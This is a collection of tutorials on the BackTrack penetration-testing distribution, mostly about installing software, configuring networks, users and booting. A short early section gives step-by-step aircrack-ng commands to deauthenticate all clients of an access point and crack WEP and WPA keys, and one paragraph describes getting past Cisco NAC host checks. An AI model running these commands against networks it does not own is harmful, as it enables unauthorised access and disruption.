With Cisco NAC Appliance, Cisco added additional detection mechanisms such as TCP fingerprinting and JavaScript OS detection, so the User Agent trick will not work. However, by changing the default parameters of the Windows TCP/IP stack the user can still connect to the network without running any host-based checks. You can do this with Kevin.

Video Demonstration:

Full Scale Video Here
Download Here

Manipulating Windows User Accounts

Xauthzx’s Underground video describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.

User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group

Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders
net use * \\[Computer Name]\[Shared Folder] – Mount Network Shared Folder

Full Scale Video Here
Download Here

Episode 12 - Hacking Basics - Backtrack

On the forums, there have been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many of these questions as possible. In this episode we cover: where to get Backtrack 2, how to burn an .ISO file, how to boot Backtrack 2, how to log in, and how to start the GUI. We also illustrate basic Linux commands and how to set up your network interfaces.


Download video here (Right Click -> Save Link as)

List of compatible adapters BackTrack

PCMCIA/Cardbus/Express Card
Airlink AWLC4030 Chipset Atheros
Belkin F5D8071 Chipset Atheros
D-Link DWA-643 Chipset Atheros
D-Link DWL-650 Chipset Prism 2.5
D-Link DWL-G630 C2 v3.01 Chipset Atheros
D-Link DWL-G630 E1 Chipset Ralink
D-Link DWL-G650 C3, C4, B5 Chipset Atheros
Linksys WPC55AG v1.2 Chipset Atheros
MSI CB54G2 Chipset Ralink
Netgear WAG511 Chipset Atheros
Netgear WG511T Chipset Atheros
Netgear WG511U Chipset Atheros
Proxim 8470-WD Chipset Atheros
Senao NL-2511 CD PLUS EXT Chipset Prism 2.5
TP-Link TL-WN610G Chipset Atheros
TrendNet TEW-441PC
Ubiquiti SRC Chipset Atheros

PCI/MiniPCI/MiniPCI Express
ASUS WL-138G V2 Chipset Broadcom
ASUS WL-138gE Chipset Broadcom
Canyon CN-WF511 Chipset rt61
D-Link DWL-G550 Chipset Atheros
Linksys WMP54G v4 Chipset Ralink
Linksys WMP54G-UK v4.1 Chipset Ralink
MSI PC54G2 Chipset Ralink
Netgear WG311T Chipset Atheros
Netgear WPN311 Chipset Atheros
Thinkpad 11a/b/g Chipset Atheros
TP-Link TL-WN650G Chipset Atheros
TP-Link TL-WN651G Chipset Atheros
Trendnet TEW-443PI A1 1R Chipset Atheros

USB
Asus WL-167g v2 Chipset Ralink RT73
Airlink AWLL3026 Chipset Zydas zd1211
Alfa AWUS036E Chipset RTL8187L
Alfa AWUS036H Chipset rtl8187
Alfa AWUS036S Chipset Ralink rt73
Digitus DN-7003GS Chipset RTL8187L
D-Link DWL-G122 B1 Chipset Ralink RT2570
D-Link DWL-G122 C1 Chipset Ralink RT73
D-Link WUA-1340 Chipset Ralink RT73
Edimax EW-7318USg Hawking HWUG1 Chipset Ralink rt73
Linksys WUSB54G v4 Chipset Ralink rt2570
Linksys WUSB54GC Chipset Ralink RT73
Netgear WG111 v1 Chipset PrismGT SoftMAC
Netgear WG111 v2 Chipset RTL8187L
TP-Link TL-WN321G Chipset Ralink RT73
Trendnet TEW-429UB C1 Chipset Zydas zd1211b
ZyXEL AG-225H Chipset Zydas zd1211
ZyXEL G-202 Chipset Zydas zd1211b

Many people recommend using an Atheros chipset; BackTrack will run stronger with it ...

Commands for Wi-Fi Hacking (BackTrack)

luthfil:
a. Disconnect all clients

aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0

b. WEP crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0
new console
aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0
aircrack-ng hasil*.cap
aircrack-ptw hasil-01.cap

c. WPA/WPA2 Crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0
new console
aircrack-ng -w password.lst [hasil*cap]



Use this wisely and responsibly

Hacking tools: A new version of BackTrack helps ethical hackers

Monday, December 1, 2008

Version 3.0 of BackTrack has been released. BackTrack is a Linux-based distribution dedicated to penetration testing or hacking (depending on how you look at it). It contains more than 300 of the world's most popular open source or freely distributable hacking tools.

I wrote about the first version of BackTrack back in 2006, although it was based off of Whax/Whoppix/Knoppix distributions, which started even earlier. Version 3.0, released on June 19, includes even more hacking tools (unfortunately, it still doesn't include Nessus due to vendor negotiations/restrictions), many bug fixes, and improved menus.

Readers often ask me how they can quickly get up to speed on hacking or defending against hackers. My answer is always the same: Subscribe to multiple computer security distribution lists, read as much as you can, and learn how to (legally) hack. BackTrack is the quickest way to get access to hundreds of tools, if the Linux part doesn't scare you. For non-Linux users, this distribution is about as Windows-friendly as you can get. Most users can get up and running using BackTrack with little or no Linux knowledge. The KDE graphical user interface makes most tools and programs usable with a few mouse clicks. For instance, setting up Snort is a one-click process (try that outside of BackTrack).

BackTrack also does a decent job for wireless and password hacking. Although there's a long list of included tools, here are my personal favorites:

  • Metasploit (vulnerability tester)
  • Snort (intrusion detection/prevention)
  • Hping (packet shaper)
  • Nmap (fe gui included)
  • Xprobe2 (OS identifier)
  • Cisco Auditing Tool
  • Curl
  • Httprint (and GUI)
  • Lynx (bare-bones browser)
  • Nikto (awesome free Web site vulnerability scanner)
  • SQL Scanner
  • Milw0rm archive
  • Dsniff
  • Ettercap
  • Hydra (password guesser)
  • John the Ripper
  • Wireshark (packet sniffer/analyzer)
  • Kismet
  • Airsnort
  • Bluesnarfer
  • SIPCrack
  • OllyDBG

Not only does BackTrack have an excellent collection of tools, the designers of the CD have tried to align BackTrack with common penetration-testing guideline frameworks, including the Open Source Security Testing Methodology Manual and Information Systems Security Assessment Framework, which can only help any budding pen tester.

You can download several different types of images, including a 784MB USB/DVD image, a stripped-down 695MB ISO, and a 689MB VMware image.

Lest I get any angry readers taking me to task for "teaching malicious hacking," these tools are for the good guys. Bad hackers are already doing just fine without the supereasy toolkits. Overall, we need more defenders learning more, and tools like BackTrack help in that regard.

Installing Programs on Backtrack [ Part I ]

Thursday, November 27, 2008

After installing the Backtrack distro on the Linux box I use, it felt incomplete without adding a few tools that help me with my writing :D For example, while writing this article I am using the Bluefish application, version 1.0.7. Besides office applications, I also installed several other applications, such as:

  • Openoffice 2.2.1
  • Abiword 2.4
  • The Gimp 2.2.17
  • Virtualbox 1.5.2
  • Cedega 5.1
  • Bluefish 1.0.7
  • Kaffeine 0.8.1
  • XMMS 1.2.10
  • Xine-ui 0.99.5

I have tried these applications and they run without problems. To add applications to Backtrack, we only need the same module converters used by the Slax distro. Because Backtrack is based on Slax, you can use tools to convert files with the extensions *.tgz, *.mo and *.rpm to *.lzm. Here I use tools such as mo2lzm, rpm2lzm, tgz2lzm and lzm2dir, all of which can be obtained from the Slax site.

Once those tools are installed on your Backtrack, you can run commands like the following:

bt ~ # mkdir -p /root/slax_modules/applikasi/chkrootkit-0.46a-6
bt ~ # mo2lzm chkrootkit_0_46a-6.mo chkrootkit_0_46a-6.lzm
bt ~ # lzm2dir chkrootkit_0_46a-6.lzm /root/slax_modules/applikasi/chkrootkit-0.46a-6

After that, you only need to copy and paste the extracted files :D

References:
http://slax.hosting4p.com
http://slax.hosting4p.com/modules.php

Compiling and Installing The Latest Xorg 7.2

If that’s not enough for you, this guide will take you through the steps of installing the latest Xorg 7.2 server. I needed to do this as well to get my new 965GM chipset working.
  1. Uninstall your old version of xorg (removepkg); packages are located in /var/log/packages
  2. Download the new packages. I got my packages from the pinki1 build. Don’t download the auto script; it will not work for you, trust me.
  3. I downloaded them all to /var/log/packages, then installed them (installpkg)
  4. Add /usr/X11R7/lib to /etc/ld.so.conf

    Add /usr/X11R7/bin to the PATH variable
    Note: you can also edit /etc/profile and find the line that says:

    PATH="/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/usr/local/apache/bin:/usr$

    And change X11R6 to X11R7

  5. Now is the time to install any graphics drivers. If you happen to be using the Intel drivers, you can find the install directions at http://intellinuxgraphics.org/install.html and the actual drivers at xorg.freedesktop.org
  6. Change all the fontpaths in /etc/X11/xorg.conf from /X11R6 to /X11R7
  7. Change your fontpaths in /etc/fonts/fonts.conf:

    /usr/X11R6/lib/X11/fonts/TTF

    might be changed to

    /usr/X11R7/lib/X11/fonts/TTF
  8. Install these packages:

    ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/Library/libpthread-stubs/libpthread-stubs-0.1-i486-1ced.tgz
    ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/X11/libxcb/libxcb-1.0-i486-1ced.tgz
    ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/X11/xcb-proto/xcb-proto

    Note: Change xcb-proto to xcb-proto.tgz so you can install it:

    # mv xcb-proto xcb-proto.tgz
  9. Run /usr/X11R6/bin/fc-cache -f as root, and as your user if you have another account.
  10. Congratulations, you’re now running xorg 7.2

Author :
remote-exploits.blogspot.com


Compiling ALSA

“ALSA (an acronym for Advanced Linux Sound Architecture) is a Linux kernel module that replaces several different kernel drivers for sound cards with a single device driver which handles the diversity of sound cards internally. Some of the goals of the ALSA project were to support automatic configuration of sound card hardware, and graceful handling of multiple sound devices in a system, goals which it has largely met.”

  1. Unpack the source:
    # bunzip2 alsa-driver* && tar -xvf alsa-driver*
  2. Change to the new directory:
    # cd alsa*
  3. Configure and compile ALSA:
    # ./configure && make
  4. Begin the install:
    # make install
  5. If your card is supported (http://www.alsa-project.org/alsa-doc/), run ‘alsaconf’ and follow the directions:
    # alsaconf
  6. Then, to configure sound and mixer options:
    # alsamixer

Author :
remote-exploits.blogspot.com

Connecting to an OPEN/WEP WLAN (DHCP)

To connect to a wireless LAN that is open or secured by WEP (DHCP).

# iwconfig [interface] mode managed key [WEP key]

Note:

Replace “interface” with the name of your currently active interface, for example ath0, wlan0 or eth1.
WEP key: enter the WEP key, 10 hexadecimal characters for 64-bit and 26 characters for 128-bit.

# iwconfig [interface] essid "[ESSID]"

ESSID = the SSID of the WLAN

# dhclient [interface]

Obtains the IP address, netmask, DNS server and default gateway from the access point.

Connecting to an OPEN/WEP WLAN (Manual IP Setup)

To connect to a wireless LAN that is open or secured by WEP (manual/static IP).

# iwconfig [interface] mode managed key [WEP key]
# ifconfig [interface] [IP address] netmask [subnetmask]
# iwconfig [interface] essid "[ESSID]"
# route add default gw [IP of default gateway]

Note:

Enter the gateway's IP address (usually the IP address of the access point)

# echo nameserver [IP address of DNS server] >> /etc/resolv.conf

Configure your DNS server.

# ping www.detik.com

Test the connection.

Collection of iwconfig Commands

# iwconfig [interface] mode master

Put the PCMCIA card into access point mode

# iwconfig [interface] mode managed

Put your PCMCIA card into client mode on an infrastructure Wi-Fi network

# iwconfig [interface] mode ad-hoc

Set your card as a member of an ad hoc Wi-Fi network without an access point

# iwconfig [interface] mode monitor

Set your card to monitor mode

# iwconfig [interface] essid "SSID_Anda"

Configure the ESSID of your network.

# iwconfig [interface] key 1111-1111-1111-1111

Set a 128-bit WEP key

# iwconfig [interface] key 11111111

Set a 64-bit WEP key

# iwconfig [interface] key off

Disable the WEP key

# iwconfig [interface] key open

Set open mode; no authentication is required

# iwconfig [interface] channel [channel no.]

Set a channel from 1 to 14

# iwconfig [interface] channel auto

Select the channel automatically

# iwconfig [interface] freq 2.422G

Set the channel by frequency in GHz

# iwconfig [interface] ap 11:11:11:11:11:11

Force the card to register with the AP at this address

# iwconfig [interface] rate 11M

The card will use the specified rate

# iwconfig [interface] rate auto

Select the rate automatically

# iwconfig [interface] rate auto 5.5M

The card will use the specified rate and lower rates if needed

Gateway Backtrack2

Straight to the point: this tutorial complements bang alie's post titled “Router Backtrack”. To build a gateway using the Backtrack Linux distro, the first step is of course to have Backtrack installed on the computer that will act as the gateway; here I use Backtrack2 as the test system… eth0 is connected directly to the internet, with the following details:

IP Address : 203.81.xxx.xx5
Netmask : 255.255.255.0
Gateway : 203.81.xxx.xx1
Nameserver :
203.81.xx4.11
203.81.xx5.12

eth1 is connected to the clients on the network, with the following details:

IP Address : 192.168.0.1
Netmask : 255.255.255.0

After some confusion fiddling with things so that the network settings would come up at startup, from the GUI, to typing the netconfig command in the console, and even editing the /etc/rc.d/rc.inet1.conf file, the result was still nothing (because I'm still a newbie… :) ). To enable NAT (Network Address Translation) we usually (on Slackware) put a few iptables command lines in /etc/rc.d/rc.local, but I did not do that here. As an alternative, I tried replacing the contents of /etc/rc.d/rc.inet1 with a few command lines that set up the network as well as iptables (simple iptables commands, of course). Here are the steps I took:

# chmod +x /etc/rc.d/rc.ip_forward
# echo "1" > /proc/sys/net/ipv4/ip_forward

These commands enable the option that makes this Linux box function as a router.

Enter the name servers in the /etc/resolv.conf file:

# echo "nameserver 203.81.xx4.11" > /etc/resolv.conf
# echo "nameserver 203.81.xx5.12" >> /etc/resolv.conf
# cat /etc/resolv.conf
nameserver 203.81.xx4.11
nameserver 203.81.xx5.12

Before that, I backed up the default file first…

# mv /etc/rc.d/rc.inet1 /etc/rc.d/rc.inet1.old
# nano /etc/rc.d/rc.inet1

Its contents are as follows (adjust to the details above):

# rc.inet1 This shell script boots up the base INET system.
#
# Version: @(#)/etc/rc.d/rc.inet1 1.01 05/27/93
# Modified by atoz [at] debian-id [dot] org

# Attach the loopback device.
/sbin/ifconfig lo 127.0.0.1
/sbin/route add -net 127.0.0.0 netmask 255.0.0.0 lo

# Auto eth0.
IPADDR[0]="" # REPLACE with YOUR IP address!
NETMASK[0]="" # REPLACE with YOUR netmask!
NETWORK[0]="" # REPLACE with YOUR network address!
BROADCAST[0]="" # REPLACE with YOUR broadcast address, if you
# have one. If not, leave blank and edit below.

GATEWAY="" # REPLACE with YOUR gateway address!

# Uncomment the line below to initialize the ethernet device.
/sbin/ifconfig eth0 ${IPADDR[0]} broadcast ${BROADCAST[0]} netmask ${NETMASK[0]}

# Uncomment this to set up your gateway route:
/sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 metric 1

# Auto eth1.
IPADDR[1]="" # REPLACE with YOUR IP address!
NETMASK[1]="" # REPLACE with YOUR netmask!
NETWORK[1]="" # REPLACE with YOUR network address!
BROADCAST[1]="" # REPLACE with YOUR broadcast address, if you
# have one. If not, leave blank and edit below.

# Uncomment the line below to initialize the ethernet device.
/sbin/ifconfig eth1 ${IPADDR[1]} broadcast ${BROADCAST[1]} netmask ${NETMASK[1]}

# Network Address Translation ( NAT ).
iptables -A FORWARD -o eth0 -i ! eth1 -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -f -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# End of rc.inet1

You can try shutting down the Linux box you are using and then enjoy the result :)
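The rc.inet1 above only appends ACCEPT rules to the FORWARD chain, so it filters nothing unless that chain's policy has been set to DROP somewhere else. As an added example (not the author's script), the function below prints a default-deny ruleset for the same two-interface layout; the function names are illustrative, and the WAN and LAN interface names are passed as arguments.

```shell
#!/bin/sh
# Added example: print (do not apply) a default-deny FORWARD ruleset for a
# two-interface NAT gateway. Review the output, then pipe it to sh as root.

# valid_iface NAME: accept only plain interface names so that nothing
# unexpected ends up inside the generated commands.
valid_iface() {
    case "$1" in
        ''|*[!A-Za-z0-9._-]*) return 1 ;;
    esac
    [ "${#1}" -le 15 ]
}

# gateway_rules WAN LAN: WAN faces the internet, LAN faces the clients.
gateway_rules() {
    wan=$1
    lan=$2
    valid_iface "$wan" && valid_iface "$lan" || {
        echo "invalid interface name" >&2
        return 1
    }
    [ "$wan" != "$lan" ] || {
        echo "WAN and LAN interfaces must differ" >&2
        return 1
    }
    cat <<EOF
iptables -P FORWARD DROP
iptables -F FORWARD
iptables -A FORWARD -i $lan -o $wan -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i $wan -o $lan -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o $wan -j MASQUERADE
EOF
}

# Typical use with the layout from the post (eth0 = internet, eth1 = clients):
#   gateway_rules eth0 eth1          # inspect the rules
#   gateway_rules eth0 eth1 | sh     # apply them as root
```

With this ruleset, clients behind the LAN interface can open connections outward, while traffic arriving on the WAN interface is forwarded only when it belongs to a connection a client started.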

User Management on Backtrack

Backtrack is derived from the Slax distro, and could be called the grandchild of the Slackware distro. For those who have used or are familiar with this old distro (Slackware, Ed.), creating a user will of course not take long, so this tutorial is aimed at Linux newbies like me :p
I also published this tutorial on the BacktrackIndo blog.

For example, we create a new user named anonymous. Here are the steps:

First check which user you are currently logged in as. As root, of course :))
Well… no other user has been created yet, after all… (AtoZ is crazy!!!… :)) )

# whoami
root


Before continuing to the user creation step, I will first create a public_html folder
in the /etc/skel directory so that, once the user has been created, a public_html folder
is automatically created in that user's home directory as well ( /home/anonymous/public_html ):

# mkdir /etc/skel/public_html

Now we move on to creating the user:

# adduser anonymous

Login name for new user: anonymous

User ID (’UID’) [ defaults to next available ]:

Initial group [ users ]:

Additional groups (comma separated) []:

Home directory [ /home/anonymous ]

Shell [ /bin/bash ]

Expiry date (YYYY-MM-DD) []:

New account will be created as follows:

—————————————
Login name…….: anonymous
UID…………..: [ Next available ]
Initial group….: users
Additional groups: [ None ]
Home directory…: /home/anonymous
Shell…………: /bin/bash
Expiry date……: [ Never ]

This is it… if you want to bail out, hit Control-C. Otherwise, press
ENTER to go ahead and make the account.

Creating new account…

Changing the user information for anonymous
Enter the new value, or press ENTER for the default
Full Name []: anonymous
Room Number []:
Work Phone []:
Home Phone []:
Other []: atoz@bungker.org
Changing password for anonymous
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Account setup complete.

Note:
Enter the user name, user ID number, nickname or initials, home directory, the shell to use,
and the expiry date of the account being created.

To delete a user, run the command:

# userdel anonymous

Every user has a group, which is useful when working on a network. All users in the same group have the same access rights as well. To add a group, use the command:

# groupadd [nama_group]

To delete it, use the command:

# groupdel [nama_group]

If you want to modify a user account you have, use the usermod command. For example, you want to change
the group of the user anonymous to the wheel group.

# usermod -G wheel anonymous
# id anonymous
uid=1001(anonymous) gid=100(users) groups=100(users),10(wheel)

To see the manual for the commands mentioned above, use the command man [nama_perintah]. Example:

# man usermod

That is all for our discussion for now. Happy trying :)

BackTrack

ALL ABOUT BACK|TRACK
remote-exploit
wiki backtrack
forum remote-exploit
offensive security
INDONESIAN BACKTRACK
backtrack newbie
indonesian backtrack community
collecting about backtrack pentest
yogyafree backtrack
bungker.org

dadang haryadi backtrack
http://download.cyber-isp.net/linux/Backtrack/ download BT1
http://yum.jardiknas.org/backtrack/ download BT2
http://ftp.fisika.ui.ac.id/pub/linux/iso-cd/backtrack/ download BT2
http://repo.ugm.ac.id/iso/backtrack/ download BT2&3
echo backtrack
ALL ABOUT SLACKWARE

How to Use Backtrack Linux

OK, a lot of people have been asking how to use Backtrack Linux.
Here I will cover "a little" of how to use Backtrack Linux.
First download the Linux as a live CD: download backtrack2
Then burn it to a live CD: "how-to"
Boot the computer from the CD (don't forget to set first boot to CD in the BIOS)
=============================================================

-------------------------------------------------------
:: Backtrack 2.0 ::
BackTrack
login: root
password: toor
--------------------------------------------------------
*** When finished, hit Ctrl+Alt+Delete and
wait until the computer reboots ***
--------------------------------------------------------
slax login:_
=============================================================
Then log in with login: root and password: toor
After that, type xconf
=============================================================
Trying to autoconfigure Xwindow system, please wait...
creating /etc/X11/xorg.conf...
all done. Run startx now.
=============================================================
Or type startx directly
or you can type guifast
OK, now you are inside Backtrack Linux.


Backtrack will usually set up the network via DHCP, but if it doesn't, here is how:
setting the IP via DHCP.
how:
type "dhcpcd eth0"
(eth0 here depends on the LAN card you are using)
to verify, type ifconfig


setting a static IP.
how:
type "ifconfig eth0 192.168.1.2/24" -> set the IP and subnet
type "route add default gw 192.168.1.1" -> set the gateway
type "echo nameserver 192.168.1.1 > /etc/resolv.conf" -> set the DNS
to verify, type ifconfig


Don't forget to change the password
how:
type "passwd" and enter a "strong" password


to bring up a bash command prompt you can type:
leetmode or yakuake


how to install Backtrack to the hard disk with a dual-boot option:
run "Qtparted" from that Linux, from the bash command line
inside qtparted you will see the partitions (like fdisk on Windows)
e.g. 4 GB
first partition 3.5 GB
second partition 0.5 GB
format the first partition as ext3
format the second partition as linux-swap
(qtparted tends to misbehave here; open a shell and umount or mount hda1 and hda2)
this is so that qtparted can create or format; after that, don't forget to commit in its toolbar
after that open "backtrack installer" and choose "install backtrack to hda2"; this depends on your hard disk
for SATA the name is usually sda, for IDE it is usually hda (hda1 for Windows and hda2 for Linux ext3); wait until it reaches 100%, then restart and it boots into Linux automatically
from Linux open a shell, go to the /etc folder, type "nano lilo.conf", then in that lilo file add this above image
==============================
other = /dev/hda1
label = Windows
table = /dev/hda
==============================
so mine ends up like this
==============================
boot = /dev/hda
prompt
timeout =1200
bitmap=/boot/splash.bmp
change-rules
reset
vga = 0x317
other = /dev/hda1
label = Windows_Xp
table = /dev/hda
image = /boot/vmlinuz
root = current
initrd = /boot/splash.initrd
label = Backtrack_2
read-only
========================
done; now restart and you will see that at first boot you are asked to choose between w1nd0ws and Linux


Now changing Backtrack's first screen:
how:
type this in the shell, a.k.a. the command prompt in w1nd0ws terms
bt ~ # nano /etc/issue
that's it, just customize it yourself


changing the command-line logon so that KDE starts automatically:
bt ~ # nano /etc/inittab
change id:3:initdefault: to id:4:initdefault:


making leetmode start automatically
type:
cd /root/.kde/Autostart
ln -s /usr/bin/leetmode leetmode
this creates a leetmode link in Autostart


making yakuake start automatically
type:
cd /root/.kde/Autostart
ln -s /opt/kde/bin/yakuake yakuake
now in KDE you only need to press F12


The script below is what makes the CD-ROM eject automatically:
type:
cd /etc/rc.d
type:
nano rc.6
look for code like this:
# eject cdrom devices
. ./usr/lib/liblinuxlive
#echo "Ejecting all CDROMs..."
#list_cdrom_devices | while read DEVICE; do
# cdrecord dev=$DEVICE -eject >/dev/null 2>/dev/null
# can't use eject because it's not working with our kernel
# eject -s $DEVICE >/dev/null 2>/dev/null
#done
#echo "========================================"
#echo "It's safe to switch the computer off now"
#echo -ne "Press Enter to $command "
#read junk


how to change the message shown at first boot:
nano /etc/issue


how to install the Java client:
INSTALL JAVA CLIENT
http://java.com/en/download/manual.jsp
- Download Java Linux (self-extracting file)
- cd opt
- mkdir java
- cp /tmp/jre-6u1-linux-i586.bin /opt/java
- cd java
- ls
- chmod a+x jre-6u1-linux-i586.bin
- ls -l
- ./jre-6u1-linux-i586.bin
- yes
- ls
http://java.com/en/download/help/5000010500.xml#enable
- cd /opt/firefox/plugins
- ln -s /opt/java/jre1.6.0_01/plugin/i386/ns7/libjavaplugin_oji.so
- Firefox-Preferences-Content-Enable java
Good luck.


secure shell daemon
how:
type "sshd-generate"
type "/usr/sbin/sshd"
type "netstat -ant | grep 22"


Setting up an HTTP server, or in newbie terms, a web server
how:
type "apachectl start" -> starts the Apache web server
type "netstat -ant | grep 80" -> check whether port 80 is active
type "apachectl stop" -> stops the Apache server
type "netstat -ant | grep 80" -> check again


setting up a file transfer protocol server, or by its cooler name, an FTP server
how:
type "atftpd --daemon --port 69 /tmp/"
type "netstat -anu | grep 69"


setting up a VNC server, usually used for remote control
how:
type "vncserver"
enter a password of 8 digits or more
type "netstat -ant | grep 5901"
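The `netstat ... grep 22` style checks above also match ports such as 2222 and established connections to a remote port 22, and they do not show whether a service is reachable from the network. As an added example (not part of the original post), the function below matches the local TCP port exactly and reports the bind scope of each listener; the function name and the sample netstat output are constructed for illustration, and UDP services such as atftpd are out of scope because they have no LISTEN state.

```shell
#!/bin/sh
# Added example: exact-match listener check over `netstat -ant` output.

# Constructed sample output (not captured from a real host).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.2:41522       192.168.1.10:22         ESTABLISHED
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN'

# listeners PORT: read netstat output on stdin and print one line per TCP
# listener on exactly PORT, as "<bind address> <local-only|network>".
listeners() {
    awk -v port="$1" '
        $1 ~ /^tcp/ && $NF == "LISTEN" {
            # The port is the text after the last colon of the local address.
            n = split($4, part, ":")
            if (part[n] != port) next
            addr = substr($4, 1, length($4) - length(part[n]) - 1)
            # Loopback binds are reachable only from the machine itself.
            scope = (addr == "127.0.0.1" || addr == "::1") ? "local-only" : "network"
            print addr, scope
        }'
}

# On a live system: netstat -ant | listeners 22
# Against the constructed sample:
printf '%s\n' "$SAMPLE_NETSTAT" | listeners 22
```

A result of "network" for sshd or vncserver means the service accepts connections from other hosts, which matters on a machine that still uses the default root password mentioned earlier.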

how to set up dual boot automatically (configured by Linux itself)
just type "liloconfig" and follow the prompts

IP configuration using netconfig
in the shell just type "netconfig"

to make the IP permanent
go into etc and edit the rc.inet1 file: "nano /etc/rc.d/rc.inet1.conf"
change:
# Config information for eth0:
IPADDR[0]="xxx.xxx.xxx.xxx"
NETMASK[0]="255.255.255.xxx"
USE_DHCP[0]=""
DHCP_HOSTNAME[0]=""
# Default gateway IP address:
GATEWAY="xxx.xxx.xxx.xx"
jangan lupa ketik
bt rc.d # rc.inet1

bikin techmon kayak leetmode di BT3
caranya di sheel ketik "superkaramba" trus download filenya jadi degh di desktop

cara install paket yang berextention .tgz
tinggal ketik:
"installpkg namapaket.tgz"

mengextrax file .gz
"tar -xzvf namafile.gz"
$ tar -zxvf nama_file.tar.gz -C /folder/tujuan/

mengextrax file .bz2
"tar -xjvf namafile.bz2"

How to update the Slackware base in BackTrack with slapt-get:
type this in the shell: "slapt-get --update", then type "slapt-get --upgrade"
type "kwrite /etc/slapt-get/slapt-getrc"
add:
SOURCE=http://darkstar.ist.utl.pt/slackware/
to download the updates
Another program is:
Kslackcheck, also for updating Slackware
here is the kslackcheck download
to install it just "installpkg namafile.tgz"; when done, look for it under System

Add fast-track to BT2
first download fast-track
then put it in the directory "/pentest/misc/"
after that type "chmod 755 fast-track.py"

Configure sound in BackTrack
just type "alsaconf" and follow the prompts; when done, type "alsamixer"; after setting the volume, type "alsactl store" to save it

This is a strange one: why would a pentest distro have an office suite?
Ah well, never mind, it's all part of learning
first download the office suite from OpenOffice
extract "tar -xzvf OOo_2.3.1_LinuxIntel_install_en-US.tar.gz"
go into the folder "cd OOG680_m9_native_packed-1_en-US.9238"
go into the folder "cd RPMS"
type this "rpm2tgz *.rpm"
install "installpkg *.tgz"
go into the directory "cd /opt/openoffice.org2.3/program/"
run the program "soffice"
Add it to the KDE start menu
click the KDE start button, right-click and choose "edit menu"
choose editor, then right-click and choose new item
name : office
command : '/opt/openoffice.org2.3/program/soffice' # include the ' marks
work path : /opt/openoffice.org2.3/program
finish
greetz to irfahmi
finish

To choose a window manager, type "xwmconfig"


To read NTFS, use ntfs-3g
first unmount the partition you want to mount as NTFS
"umount /dev/hda"
"ntfs-3g /dev/hda /mnt/hda? -o force"

How to install Xvidcap for making video tutorials
download it
then "installpkg namafile"

Install the KMail client
download KMail
"tar -xjvf kdepim-3.5.6.tar.bz2"
"./configure && make && make install"

Install Thunderbird
download Thunderbird
extract "tar -zxvf thunderbird-2.0.0.12.tar.gz"
create a link to it in the KDE menu editor, named Thunderbird
or "double-click thunderbird"

A friend of mine asked how to change the password
just type "passwd" and enter a long password
so that your Linux doesn't prompt you about it

Enabling SSH on BackTrack for the first time
"setup-sshd"; to start it, "start-sshd"
to stop it, "stop-sshd"

To enable the firewall automatically in BackTrack
bt / # cat >> /etc/rc.d/rc.local
. /etc/rc.d/rc.FireWall start
^d
bt / #
greetz willy, Slackware master


What is a kernel? (see here)
What is the difference between an SMP kernel and a regular kernel? (see here)

=========================================
Install BT3 to the hard disk
=========================================
I won't explain how to create
partitions on the hard disk
Prepare the disk partitions, for example:
sda1=backtrack
sda2=swap
------------------------------
bt~#mkdir /mnt/backtrack
bt~#mount /dev/sda3 /mnt/backtrack/
bt~#mkdir /mnt/backtrack/boot/
bt~#mount /dev/sda1 /mnt/backtrack/boot/
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/
bt~#mkdir /mnt/backtrack/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack/dev/
bt~#mount -t proc proc /mnt/backtrack/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack/boot/
------------------------------
set up LILO.
bt~#chroot /mnt/backtrack/ /bin/bash
bt~#nano /etc/lilo.conf
------------------------------
# Contents of lilo.conf
lba32
boot = /dev/sda
prompt
timeout=60
change-rules
reset
vga=791 # depends on your display; check the value already in place
image = /boot/vmlinuz
root = /dev/sda3
label = Backtrack3_final
# end
bt~#lilo -v
bt~#exit
------------------------------
then reboot the computer :)


Everything is typed without the " " quotes
